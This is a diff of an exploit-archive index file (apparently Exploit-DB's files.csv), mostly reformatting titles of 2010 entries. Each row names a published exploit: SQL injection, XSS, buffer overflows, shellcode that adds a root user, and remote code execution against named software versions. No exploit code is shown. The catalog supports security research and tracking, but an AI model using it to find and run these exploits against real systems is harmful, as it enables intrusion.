+13900,platforms/php/webapps/13900.txt,"Easy Travel Portal - SQL",2010-06-17,"L0rd CrusAd3r",php,webapps,0 +13901,platforms/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",asp,webapps,0 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [CSRF] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0 13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)",2010-06-17,mr_me,windows,local,0 -13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139 +13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 @@ -12259,7 +12259,7 @@ id,file,description,date,author,platform,type,port 13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 -13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 +13918,platforms/multiple/webapps/13918.txt,"Spring Framework - arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - (.mp4) Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13920,platforms/windows/dos/13920.c,"H264WebCam Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0 13921,platforms/windows/dos/13921.c,"PowerZip 7.21 - (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 @@ -12283,11 +12283,11 @@ id,file,description,date,author,platform,type,port 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 -13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass / XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13944,platforms/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique - (page) SQL Injection and XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13946,platforms/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13948,platforms/php/webapps/13948.txt,"OroHYIP SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13951,platforms/php/webapps/13951.txt,"Joomla Component com_eportfolio - Upload",2010-06-20,Sid3^effects,php,webapps,0 13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - (news.php) SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 @@ -12333,7 +12333,7 @@ id,file,description,date,author,platform,type,port 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - (.plf) SEH universale Buffer Overflow",2010-06-23,Madjix,windows,local,0 13999,platforms/php/webapps/13999.html,"Software Index - Remote File Upload Exploit",2010-06-23,indoushka,php,webapps,0 -14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection",2010-06-23,indoushka,php,webapps,0 +14000,platforms/php/webapps/14000.txt,"PishBini Footbal - XSS / SQL Injection",2010-06-23,indoushka,php,webapps,0 14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 @@ -12376,12 +12376,12 @@ id,file,description,date,author,platform,type,port 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 -14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter",2010-06-26,sebug,php,webapps,0 +14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component - Persistent XSS",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component - LFI",2010-06-26,Sid3^effects,php,webapps,0 14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQLi",2010-06-28,JaMbA,php,webapps,0 -14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 +14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,windows,dos,6667 14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - (buyupg.php) SQL Injection",2010-06-28,Dark.Man,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar - LFI",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI",2010-06-26,Sid3^effects,php,webapps,0 @@ -12440,7 +12440,7 @@ id,file,description,date,author,platform,type,port 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website SQL Injection",2010-06-30,JaMbA,php,webapps,0 14145,platforms/php/webapps/14145.txt,"Golf Club Site - SQL Injection",2010-06-30,JaMbA,php,webapps,0 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0Day)",2010-06-30,emgent,hardware,webapps,80 -14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF",2010-07-01,"ADEO Security",php,webapps,0 +14147,platforms/php/webapps/14147.txt,"NinkoBB - CSRF",2010-07-01,"ADEO Security",php,webapps,0 14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR + DEP Bypass)",2010-07-01,Node,windows,local,0 14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0 @@ -12467,11 +12467,11 @@ id,file,description,date,author,platform,type,port 14183,platforms/php/webapps/14183.txt,"Joomla Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0 14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 14180,platforms/windows/remote/14180.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14181,platforms/windows/remote/14181.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 -14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0 +14185,platforms/multiple/dos/14185.py,"ISC-DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0 @@ -12487,7 +12487,7 @@ id,file,description,date,author,platform,type,port 14199,platforms/php/webapps/14199.txt,"phpaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow Exploit",2010-07-04,blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"phpaaCMS - (list.php?id) SQL Injection",2010-07-04,CoBRa_21,php,webapps,0 -14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI",2010-07-04,Sid3^effects,php,webapps,0 +14202,platforms/php/webapps/14202.txt,"iLister Listing Software - LFI",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 @@ -12531,13 +12531,13 @@ id,file,description,date,author,platform,type,port 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote BOF / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQLi",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 -14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X - ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - CSRF",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 -14256,platforms/windows/local/14256.txt,"HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 +14256,platforms/windows/local/14256.txt,"HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0 14259,platforms/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,php,webapps,0 -14260,platforms/php/webapps/14260.txt,"Sijio Community Software SQL Injection/Persistent XSS",2010-07-07,Sid3^effects,php,webapps,0 +14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection/Persistent XSS",2010-07-07,Sid3^effects,php,webapps,0 14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station Running Config CSRF Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 @@ -12557,14 +12557,14 @@ id,file,description,date,author,platform,type,port 14280,platforms/php/webapps/14280.txt,"PG Social Networking - Shell Upload",2010-07-08,SONIC,php,webapps,0 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB - SQL Injection",2010-07-08,SONIC,asp,webapps,0 -14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 +14282,platforms/windows/dos/14282.txt,"cmd.exe - Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server - SQL Injection",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 -14293,platforms/php/webapps/14293.txt,"Minify4Joomla Upload and Persistent XSS",2010-07-09,Sid3^effects,php,webapps,0 +14293,platforms/php/webapps/14293.txt,"Minify4Joomla - Upload and Persistent XSS",2010-07-09,Sid3^effects,php,webapps,0 14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla - SQLi",2010-07-09,Sid3^effects,php,webapps,0 14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0 @@ -12583,7 +12583,7 @@ id,file,description,date,author,platform,type,port 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 -14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 +14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection",2010-07-10,v3n0m,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe - Persistent XSS",2010-07-10,Sid3^effects,php,webapps,0 @@ -12618,14 +12618,14 @@ id,file,description,date,author,platform,type,port 14371,platforms/php/webapps/14371.txt,"BS Scripts Directory - (articlesdetails.php) SQL Injection",2010-07-16,k4k4shi,php,webapps,0 14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 14373,platforms/win_x86/local/14373.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow universal",2010-07-16,Madjix,win_x86,local,0 -14374,platforms/php/webapps/14374.txt,"Pre Web Host System Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14375,platforms/php/webapps/14375.txt,"Pre Dynamic Institution Web Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14376,platforms/php/webapps/14376.txt,"Pre E-Smart Cart Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14377,platforms/php/webapps/14377.txt,"Pre SoftClones Marketing Management System Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14378,platforms/php/webapps/14378.txt,"Pre Podcast Portal Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 -14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 -14381,platforms/php/webapps/14381.txt,"Group Office Remote Command Execution",2010-07-16,"ADEO Security",php,webapps,0 +14374,platforms/php/webapps/14374.txt,"Pre Web Host System - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14375,platforms/php/webapps/14375.txt,"Pre Dynamic Institution - Web Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14376,platforms/php/webapps/14376.txt,"Pre E-Smart Cart - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14377,platforms/php/webapps/14377.txt,"Pre SoftClones Marketing Management System - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14378,platforms/php/webapps/14378.txt,"Pre Podcast Portal - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 +14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 +14381,platforms/php/webapps/14381.txt,"Group Office - Remote Command Execution",2010-07-16,"ADEO Security",php,webapps,0 14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA - CSRF",2010-07-16,Markot,windows,webapps,0 14383,platforms/php/webapps/14383.txt,"Group Office - (comment_id) SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps,0 14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection",2010-07-20,v0calist,asp,webapps,0 @@ -12636,23 +12636,23 @@ id,file,description,date,author,platform,type,port 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Upload",2010-07-17,Sid3^effects,php,webapps,0 -14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 +14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent XSS",2010-07-17,Sid3^effects,php,webapps,0 14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix - (cal_cat.php) SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14397,platforms/windows/local/14397.rb,"MoreAmp - SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - (functions.php) SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 -14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 +14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 +14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post-Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post-Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdiskyou,windows,remote,0 +14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post-Auth)",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"GhostScript - .PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 -14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 +14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta - DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 -14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 +14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (Metasploit)",2010-07-19,Madjix,windows,remote,0 14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 @@ -12669,7 +12669,7 @@ id,file,description,date,author,platform,type,port 14428,platforms/windows/local/14428.py,"QQPlayer - .asx File Processing Buffer Overflow Exploit",2010-07-21,"Li Qingshan",windows,local,0 14431,platforms/windows/local/14431.py,"QQPlayer - .cue File Buffer Overflow Exploit",2010-07-21,"Lufeng Li",windows,local,0 14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 -14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts Remote File Upload",2010-07-21,H-SK33PY,php,webapps,0 +14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Remote File Upload",2010-07-21,H-SK33PY,php,webapps,0 14433,platforms/windows/local/14433.pl,"ZipCentral - (.zip) Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - (welcome.php id) Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - (news.php id) Blind SQL Injection",2010-07-22,JosS,php,webapps,0 @@ -12679,7 +12679,7 @@ id,file,description,date,author,platform,type,port 14440,platforms/php/webapps/14440.txt,"PHPBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,php,webapps,0 -14443,platforms/php/webapps/14443.txt,"LILDBI Shell Upload",2010-07-23,EraGoN,php,webapps,0 +14443,platforms/php/webapps/14443.txt,"LILDBI - Shell Upload",2010-07-23,EraGoN,php,webapps,0 14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0 @@ -12687,12 +12687,12 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (beta) & 1 (beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post-Auth) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 -14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 +14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps,0 14458,platforms/php/webapps/14458.txt,"sNews - (index.php) SQL Injection",2010-07-24,MajoR,php,webapps,0 14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent XSS",2010-07-24,K053,php,webapps,0 @@ -12716,7 +12716,7 @@ id,file,description,date,author,platform,type,port 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote DoS",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 